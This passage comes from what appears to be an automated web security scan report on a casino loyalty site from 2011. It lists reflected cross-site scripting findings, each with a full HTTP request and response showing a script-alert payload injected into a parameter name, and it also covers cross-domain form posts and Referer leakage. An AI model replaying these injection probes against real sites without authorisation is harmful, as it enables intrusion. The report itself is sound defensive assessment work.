Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/showboat-atlantic-city/hotel-casino/property-home.shtml?c9cae<script>alert(1)</script>995c908484d=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:27 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 365
Location: http://www.showboatac.com/casinos/showboat-atlantic-city/hotel-casino/property-home.shtml?c9cae<script>alert(1)</script>995c908484d=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.showboatac.com/casinos/showboat-atlantic-city/hotel-casino/property-home.shtml?c9cae<script>alert(1)</script>995c908484d=1">http://www.showboatac.com/casinos/showboat-atlantic-city/hotel-casino/property-home.shtml?c9cae<script>alert(1)</script>995c908484d=1</a>
...[SNIP]...

3.20. http://www.totalrewards.com/casinos/showboat-atlantic-city/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/showboat-atlantic-city/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a6b"><script>alert(1)</script>f6d72dc5366 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/showboat-atlantic-city/hotel-casino/property-home.shtml?79a6b"><script>alert(1)</script>f6d72dc5366=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:27 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 369
Location: http://www.showboatac.com/casinos/showboat-atlantic-city/hotel-casino/property-home.shtml?79a6b"><script>alert(1)</script>f6d72dc5366=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.showboatac.com/casinos/showboat-atlantic-city/hotel-casino/property-home.shtml?79a6b"><script>alert(1)</script>f6d72dc5366=1">
...[SNIP]...

3.21. http://www.totalrewards.com/casinos/tunica-roadhouse/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/tunica-roadhouse/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aec3b"><script>alert(1)</script>d58fbadee20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/tunica-roadhouse/hotel-casino/property-home.shtml?aec3b"><script>alert(1)</script>d58fbadee20=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:26 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 369
Location: http://www.tunica-roadhouse.com/casinos/tunica-roadhouse/hotel-casino/property-home.shtml?aec3b"><script>alert(1)</script>d58fbadee20=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.tunica-roadhouse.com/casinos/tunica-roadhouse/hotel-casino/property-home.shtml?aec3b"><script>alert(1)</script>d58fbadee20=1">
...[SNIP]...

3.22. http://www.totalrewards.com/casinos/tunica-roadhouse/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/tunica-roadhouse/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 60b3e<script>alert(1)</script>1e11c0b82ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/tunica-roadhouse/hotel-casino/property-home.shtml?60b3e<script>alert(1)</script>1e11c0b82ad=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:26 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 365
Location: http://www.tunica-roadhouse.com/casinos/tunica-roadhouse/hotel-casino/property-home.shtml?60b3e<script>alert(1)</script>1e11c0b82ad=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.tunica-roadhouse.com/casinos/tunica-roadhouse/hotel-casino/property-home.shtml?60b3e<script>alert(1)</script>1e11c0b82ad=1">http://www.tunica-roadhouse.com/casinos/tunica-roadhouse/hotel-casino/property-home.shtml?60b3e<script>alert(1)</script>1e11c0b82ad=1</a>
...[SNIP]...

3.23. http://www.totalrewards.com/destinations/las-vegas/hotel-casinos/market-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /destinations/las-vegas/hotel-casinos/market-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad85a"><script>alert(1)</script>675967f16f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /destinations/las-vegas/hotel-casinos/market-home.shtml?ad85a"><script>alert(1)</script>675967f16f5=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:12 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://lasvegas.caesars.com?ad85a"><script>alert(1)</script>675967f16f5=1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 213

<html><head><title>301 Moved Permanently</title></head><body>
<h2>Object permanently moved to <a href="http://lasvegas.caesars.com?ad85a"><script>alert(1)</script>675967f16f5=1">here</a>.</h2>
</bod
...[SNIP]...

3.24. http://www.totalrewards.com/groups-meetings/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /groups-meetings/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 409e4<script>alert(1)</script>34392bbf571 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /groups-meetings/index.html?409e4<script>alert(1)</script>34392bbf571=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:24 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 285
Location: http://www.caesars.com/groups-meetings/index.html?409e4<script>alert(1)</script>34392bbf571=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.caesars.com/groups-meetings/index.html?409e4<script>alert(1)</script>34392bbf571=1">http://www.caesars.com/groups-meetings/index.html?409e4<script>alert(1)</script>34392bbf571=1</a>
...[SNIP]...

3.25. http://www.totalrewards.com/groups-meetings/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /groups-meetings/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10031"><script>alert(1)</script>76c3af1bc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /groups-meetings/index.html?10031"><script>alert(1)</script>76c3af1bc5=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:23 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 287
Location: http://www.caesars.com/groups-meetings/index.html?10031"><script>alert(1)</script>76c3af1bc5=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.caesars.com/groups-meetings/index.html?10031"><script>alert(1)</script>76c3af1bc5=1">http://www.caesars.com/gr
...[SNIP]...

3.26. http://www.totalrewards.com/las-vegas-hotels.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /las-vegas-hotels.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e5a"><script>alert(1)</script>b56c3bf8a54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /las-vegas-hotels.shtml?79e5a"><script>alert(1)</script>b56c3bf8a54=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:09 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://lasvegas.caesars.com?79e5a"><script>alert(1)</script>b56c3bf8a54=1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 213

<html><head><title>301 Moved Permanently</title></head><body>
<h2>Object permanently moved to <a href="http://lasvegas.caesars.com?79e5a"><script>alert(1)</script>b56c3bf8a54=1">here</a>.</h2>
</bod
...[SNIP]...

4. Cross-domain POST  previous  next
There are 9 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


4.1. http://www.totalrewards.com/CorporatePackageSearch.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /CorporatePackageSearch.do

Issue detail

The page contains a form which POSTs data to the domain www.harrahs.com. The form contains the following fields:

Request

GET /CorporatePackageSearch.do HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000ZvDSD7k714PY8jVA4P9dKYK:14tlevj56;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<!-- BEGIN MAKE RESERVATION MODULE -->
<form name="CheckAvailabilityForm" action="https://www.harrahs.com/MakeReservation.do" id="makeResForm" method="post">

   <INPUT type="hidden" value="FindRooms" name="action" />
...[SNIP]...

4.2. http://www.totalrewards.com/PackageSearch.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /PackageSearch.do

Issue detail

The page contains a form which POSTs data to the domain www.harrahs.com. The form contains the following fields:

Request

GET /PackageSearch.do?showAll=Y&marketCode=LVM HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000x_BmiyC-8n2Ogem00kO3Ic9:12qh2p7li;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<!-- BEGIN MAKE RESERVATION MODULE -->
<form name="CheckAvailabilityForm" action="https://www.harrahs.com/MakeReservation.do" id="makeResForm" method="post">
   <INPUT type="hidden" value="FindRooms" name="action" />
...[SNIP]...

4.3. http://www.totalrewards.com/brands/ballys/hotel-casinos/ballys-brand.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /brands/ballys/hotel-casinos/ballys-brand.shtml

Issue detail

The page contains a form which POSTs data to the domain www.harrahs.com. The form contains the following fields:

Request

GET /brands/ballys/hotel-casinos/ballys-brand.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:15 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30363


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-
...[SNIP]...
<!-- BEGIN MAKE RESERVATION MODULE -->
<form name="CheckAvailabilityForm" action="https://www.harrahs.com/MakeReservation.do" id="makeResForm" method="post">

   <INPUT type="hidden" value="FindRooms" name="action" />
...[SNIP]...

4.4. http://www.totalrewards.com/brands/caesars/hotel-casinos/caesars-brand.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /brands/caesars/hotel-casinos/caesars-brand.shtml

Issue detail

The page contains a form which POSTs data to the domain www.harrahs.com. The form contains the following fields:

Request

GET /brands/caesars/hotel-casinos/caesars-brand.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:10 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN MAKE RESERVATION MODULE -->
<form name="CheckAvailabilityForm" action="https://www.harrahs.com/MakeReservation.do" id="makeResForm" method="post">

   <INPUT type="hidden" value="FindRooms" name="action" />
...[SNIP]...

4.5. http://www.totalrewards.com/casino-gambling/slots-finder/slot-finder-home.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casino-gambling/slots-finder/slot-finder-home.shtml

Issue detail

The page contains a form which POSTs data to the domain www.harrahs.com. The form contains the following fields:

Request

GET /casino-gambling/slots-finder/slot-finder-home.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:18 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN MAKE RESERVATION MODULE -->
<form name="CheckAvailabilityForm" action="https://www.harrahs.com/MakeReservation.do" id="makeResForm" method="post">

   <INPUT type="hidden" value="FindRooms" name="action" />
...[SNIP]...

4.6. http://www.totalrewards.com/destinations/new-orleans-biloxi/hotel-casinos/market-home.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /destinations/new-orleans-biloxi/hotel-casinos/market-home.shtml

Issue detail

The page contains a form which POSTs data to the domain www.harrahs.com. The form contains the following fields:

Request

GET /destinations/new-orleans-biloxi/hotel-casinos/market-home.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:09 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<link type="text/c
...[SNIP]...
<!-- BEGIN MAKE RESERVATION MODULE -->
<form name="CheckAvailabilityForm" action="https://www.harrahs.com/MakeReservation.do" id="makeResForm" method="post">
   <INPUT type="hidden" value="FindRooms" name="action" />
...[SNIP]...

4.7. http://www.totalrewards.com/destinations/reno--tahoe/hotel-casinos/market-home.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /destinations/reno--tahoe/hotel-casinos/market-home.shtml

Issue detail

The page contains a form which POSTs data to the domain www.harrahs.com. The form contains the following fields:

Request

GET /destinations/reno--tahoe/hotel-casinos/market-home.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:08 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<link type="text/c
...[SNIP]...
<!-- BEGIN MAKE RESERVATION MODULE -->
<form name="CheckAvailabilityForm" action="https://www.harrahs.com/MakeReservation.do" id="makeResForm" method="post">
   <INPUT type="hidden" value="FindRooms" name="action" />
...[SNIP]...

4.8. http://www.totalrewards.com/destinations/tunica/hotel-casinos/market-home.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /destinations/tunica/hotel-casinos/market-home.shtml

Issue detail

The page contains a form which POSTs data to the domain www.harrahs.com. The form contains the following fields:

Request

GET /destinations/tunica/hotel-casinos/market-home.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:09 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link type="text/css" re
...[SNIP]...
<!-- BEGIN MAKE RESERVATION MODULE -->
<form name="CheckAvailabilityForm" action="https://www.harrahs.com/MakeReservation.do" id="makeResForm" method="post">
   <INPUT type="hidden" value="FindRooms" name="action" />
...[SNIP]...

4.9. http://www.totalrewards.com/index.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /index.shtml

Issue detail

The page contains a form which POSTs data to the domain www.harrahs.com. The form contains the following fields:

Request

GET /index.shtml? HTTP/1.1
Host: www.totalrewards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; mercury=Y

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 13:44:28 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN MAKE RESERVATION MODULE -->

<form name="CheckAvailabilityForm" action="https://www.harrahs.com/MakeReservation.do" id="makeResForm" method="post">
   <INPUT type="hidden" value="FindRooms" name="action" />
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://www.totalrewards.com/CorporatePackageSearch.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /CorporatePackageSearch.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /CorporatePackageSearch.do?showAll=Y HTTP/1.1
